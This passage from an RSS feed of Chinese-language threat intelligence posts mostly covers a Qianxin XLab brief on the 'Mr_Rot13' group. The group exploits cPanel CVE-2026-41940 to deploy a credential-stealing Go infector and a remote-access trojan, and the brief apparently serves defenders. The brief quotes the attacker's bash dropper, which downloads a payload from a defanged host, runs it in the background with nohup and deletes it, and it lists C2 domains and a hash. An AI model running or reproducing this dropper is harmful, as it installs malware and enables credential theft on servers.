break-all;max-width: 100%;"><p><span leaf="">Affected Version</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">NGINX 0.6.27 - 1.30.0</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">开源版受影响范围</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Affected Version</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">NGINX Plus R32 - R36</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Plus版受影响范围</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK技术映射</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">ATT&amp;CK技术</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">ID</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Exploit Public-Facing Application</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1190</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用面向Internet的Web服务器漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Command and Scripting Interpreter</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1059.003</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Unix Shell，用于成功利用后执行命令</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Create or Modify System Process</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1543.003</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化机制</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability" target="_blank">https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability</a></span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf=""><a href="https://github.com/DepthFirstDisclosures/Nginx-Rift" target="_blank">https://github.com/DepthFirstDisclosures/Nginx-Rift</a></span></span></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=89ededa3&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518823%26idx%3D1%26sn%3D19eb60f4cf7cf69c3c853406cadaa97f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 14 May 2026 18:27:00 +0800</pubDate>
    </item>
    <item>
      <title>秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518785&amp;idx=1&amp;sn=8777ef11aef31d8aa6472fc48d7a53c2</link>
      <description>XLab大网威胁感知系统持续监测到大量黑灰产组织正在积极利用CVE-2026-41940实施网络攻击，相关行为包括挖矿、勒索、僵尸网络扩散、后门植入等多种恶意活动。监测数据显示，当前已有来自全球的 2000 余个攻击源 IP 参与针对该漏洞的自动化攻击与网络犯罪活动</description>
      <content:encoded><![CDATA[<p><span>奇安信X实验室</span> <span>2026-05-13 10:01</span> <span style="display: inline-block;">北京</span></p>




  <p>以下文章来源于：奇安信XLab</p>
  <strong>奇安信XLab</strong>
  <p>奇安信XLab是国内最资深利用大规模多维度数据进行大网安全平台建设，数据分析与研究及安全应用的团队之一，建立了国内首个 PassiveDNS系统，披露了30&#43;有影响力的僵尸网络。本公众号是XLab交流技术研究成果的平台，欢迎订阅、转发、留言</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d1216432&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicPwQLR0Pf7EViba4XkgfGMbYH7fk0fZrD0pzQHoZsicK9MYfcaxXmjjg20gF5T7jGQyrHt1ah6xll36ficPIFtLmSOmceQkYficaE%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>XLab大网威胁感知系统持续监测到大量黑灰产组织正在积极利用CVE-2026-41940实施网络攻击，相关行为包括挖矿、勒索、僵尸网络扩散、后门植入等多种恶意活动。监测数据显示，当前已有来自全球的 2000 余个攻击源 IP 参与针对该漏洞的自动化攻击与网络犯罪活动</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">背景</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">CVE-2026-41940 是一个影响 cPanel &amp; WHM 的高危未授权认证绕过漏洞。该产品广泛应用于 Linux 服务器运维与虚拟主机管理。漏洞 CVSS 评分高达 9.8（Critical），攻击者无需提供账号或密码，即可远程绕过身份认证并接管 cPanel / WHM 控制面板，可使未经过身份验证的远程攻击者获得受影响服务器的管理员权限。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">自 2026 年 4 月 28 日漏洞公开披露以来，<span textstyle="" style="font-weight: bold;">XLab大网威胁感知系统</span>持续监测到大量黑灰产组织正在积极利用该漏洞实施网络攻击，相关行为包括挖矿、勒索、僵尸网络扩散、后门植入等多种恶意活动。监测数据显示，当前已有来自全球的 2000 余个攻击源 IP 参与针对该漏洞的自动化攻击与网络犯罪活动，其地域分布如下：</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.1823361823361824" data-type="jpeg" data-w="351" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035013" src="https://wechat2rss.xlab.app/img-proxy/?k=5479577f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq84RW4rcCmia8PXlsjkTGt4ZFWGqKVlibwiaJGk0kOeMmQ1iaKicEx8z1FEfmdnqibCT0WCmCxqyiaxxSIIaIlnicyiaNGNjnW37KW2AuLQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">5月2日，安全社区披露黑客已利用该漏洞成功入侵东南亚政府及军事机构，窃取了约4.37G敏感文件的安全事件。</span></p><blockquote><p><span leaf="">&#34;In total, 110 files were stolen (~4.37GB). Files were in folders named after the years 2020, 2021, … 2024. This data was stolen in March 2026, although last referenced files from November - December 2024.&#34; -- By Ctrl-Alt-Intel</span></p></blockquote><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">5月4日，我们在梳理通过CVE-2026-41940漏洞投递的恶意载荷过程中，发现了一个与众不同的新型感染器，该感染器采用Go语言编写，项目名称为&#34;Payload&#34;，其中嵌入了大量土耳其语的日志信息，疑似由AI生成。其主要功能是：向被入侵的cPanel系统植入SSH 公钥、恶意PHP、JS代码，窃取登录凭证，并将窃得的信息回传至黑客控制的Telegram群组，最终部署一个名为&#34;filemanager&#34;的远控木马。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在溯源分析时，我们发现本次活动的Downloader域名一个2022年上传至VirusTotal，至今依然0检测的PHP后门使用了JS代码中的相同的C2域名 wrned[.]com，这个域名早在2020年就投入使用。种种迹象表明，这些威胁的背后并不是那种&#34;打完就跑&#34;的投机型脚本小子，而是一个能够隐秘活动多年、至今仍未被发现的稳定黑客团体。根据创建Telegram群组时所使用的用户名（first_name）&#34;0xWR&#34;，以及JS代码中采用Rot13算法隐藏C2的行为，我们内部将这个神秘的黑客组织命名为Mr_Rot13。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">5月4日下午，ID为&#34;xrill_y&#34;的用户向Mr_Rot13创建的Telegram机器人发送了一条消息，这一举动似乎打草惊蛇（当然这只是我们的解读）。次日，Mr_Rot13迅速作出反应：升级恶意样本、更换机器人令牌（bot token），并将机器人移出群组。直到5月7日，他才再次将该机器人拉回群中。目前群组中一共有3名成员，我们的技术手段无法确认他们的身份，欢迎了解内幕的朋友向我们分享更多细节。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.30943396226415093" data-type="jpeg" data-w="795" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035009" src="https://wechat2rss.xlab.app/img-proxy/?k=c50dcc1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqickXibrFAnsq3vjQuUIFD69P8rYZH0NRaQhcoCGLVm567jJRR8uYn798SnNaiaj7ObufibPTJs4L5JOpFUgiaxyhxciaLd8OicSGdv2w%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从2020年至今的六年时间里，Mr_Rot13 的相关样本及基础设施在各安全产品中的检测率持续处于极低水平。考虑到该威胁活动仍在进行中，且涉及的 cPanel 漏洞具有高危特性，我们特撰写本威胁快讯，旨在向安全社区分享相关发现，携手共同维护网络安全。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Payload感染器</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Mr_rot13通过CVE-2026-41940投递的恶意脚本如下所示，它的功能是向下载服务器 cp.dene.[de.com 请求一个名为Update的恶意载荷，并通过 nohup 命令使其在后台持续运行（通常结合 &amp; 使用）。</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf="">F=/root/.u$$; </span></code><br/><code><span leaf="">(</span></code><br/><code><span leaf="">wget -q -O <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$F</span></span><span class="code-snippet__string">&#34;</span> <span class="code-snippet__string">&#39;<a href="https://cp.dene.de[.]com/Update" target="_blank">https://cp.dene.de[.]com/Update</a>&#39;</span> 2&gt;/dev/null </span></code><br/><code><span leaf="">||</span></code><br/><code><span leaf="">curl -sk -o <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$F</span></span><span class="code-snippet__string">&#34;</span> <span class="code-snippet__string">&#39;<a href="https://cp.dene.de[.]com/Update" target="_blank">https://cp.dene.de[.]com/Update</a>&#39;</span></span></code><br/><code><span leaf="">) </span></code><br/><code><span leaf="">&amp;&amp; <span class="code-snippet__built_in">chmod</span> 755 <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$F</span></span><span class="code-snippet__string">&#34;</span> &amp;&amp; (<span class="code-snippet__built_in">nohup</span> <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$F</span></span><span class="code-snippet__string">&#34;</span> -s &gt;/dev/null 2&gt;&amp;1 &amp;) </span></code><br/><code><span leaf="">&amp;&amp; <span class="code-snippet__built_in">sleep</span> 2; <span class="code-snippet__built_in">rm</span> -f <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$F</span></span><span class="code-snippet__string">&#34;</span></span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这个所谓的Update文件就是我们前文所说的Payload感染器，通过对下载URL的持续监控，一共捕获了3个版本，它们的功能相近，本文以5月5日捕获的最新版本为主要分析对象，基本信息如下所示：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="apache"><code><span leaf=""><span class="code-snippet__attribute">MD5</span>: fb1bc3f935fdeb3555465070ba2db33c</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">Magic</span>: ELF <span class="code-snippet__number">64</span>-bit LSB executable, x86-<span class="code-snippet__number">64</span>, version <span class="code-snippet__number">1</span> (SYSV), statically linked, stripped</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">FileName</span>: Update</span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Payload 感染器的功能直观且结构简单，分析难度较低。Payload感染器在运行时，若未指定 -s 或 --silent 参数，会逐项输出各类任务的执行状态。从字符串的风格来看，该感染器极有可能是攻击者直接借助 AI 生成的。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25522388059701495" data-type="jpeg" data-w="670" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035011" src="https://wechat2rss.xlab.app/img-proxy/?k=bbf91217&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq9YPf9wAs3TS93D0umr4PZ9O5ViaicDHvHtnhiahKbz6nQb3BShTjyVl0kBVdMroD4VhUiaEnx4WzD0TO8z1OvYTW5jZmptwRqcrmI%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><div><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, 